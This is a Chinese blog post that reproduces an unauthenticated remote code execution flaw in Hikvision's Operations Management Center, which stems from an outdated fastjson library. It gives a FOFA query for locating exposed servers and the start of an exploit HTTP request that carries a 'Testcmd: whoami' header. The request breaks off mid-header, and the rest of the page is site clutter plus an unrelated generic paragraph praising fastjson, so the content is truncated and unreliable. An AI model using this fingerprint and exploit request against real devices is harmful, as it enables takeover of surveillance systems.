海康运行管理中心 RCE漏洞复现

0x01 产品简介

 海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。海康运行管理中心是一款功能强大、易于使用的安防管理平台,能满足用户对视频监控、报警管理、设备配置和数据统计等方面的需求,帮助用户建立高效、智能的安防系统。

0x02 漏洞概述

 海康运行管理中心系统使用低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。

0x03 复现环境

FOFA:

header="X-Content-Type-Options: nosniff" && body="<h1>Welcome to OpenResty!</h1>" && header="X-Xss-Protection: 1; mode=block"

0x04 漏洞复现

Exp

POST /center/api/session HTTP/1.1
Host: your-ip
Testcmd: whoami
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: application/json, text/plain, */*
Accept-
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
海康运行管理中心是一个全球领先的视频监控解决方案和智能交通系统提供商。它包含了众多先进的技术和功能,其中就包括了 fastjson。 fastjson 是一个高性能的 Java 语言的 JSON 解析器/生成器。它的特点是速度快、内存消耗低,是当前 Java JSON 库中性能最好的选择之一。在海康运行管理中心中,fastjson 被应用于数据传输、存储和解析。通过 fastjson,海康运行管理中心可以高效地处理大量的 JSON 数据,确保系统的稳定性和性能。 在海康运行管理中心的实际应用中,fastjson 最常见的用途之一是解析来自监控摄像头和其他设备的数据。这些数据会以 JSON 格式传输到管理中心,fastjson 可以快速而准确地解析这些数据,并将其转化为系统可以直接使用的格式,从而实现对监控画面和设备状态的实时监测和管理。 此外,海康运行管理中心也利用 fastjson 在系统内部进行数据交互。各个模块之间需要频繁地传递和处理 JSON 格式的数据,fastjson 的高性能和低内存消耗保证了这些数据传输过程的高效性和稳定性。 总的来说,fastjson 在海康运行管理中心中扮演了重要的角色,它为系统的高效运行和稳定性提供了可靠的支持。通过 fastjson,海康运行管理中心可以更好地处理和管理大量的 JSON 数据,从而为用户提供更加可靠和优质的视频监控和智能交通解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值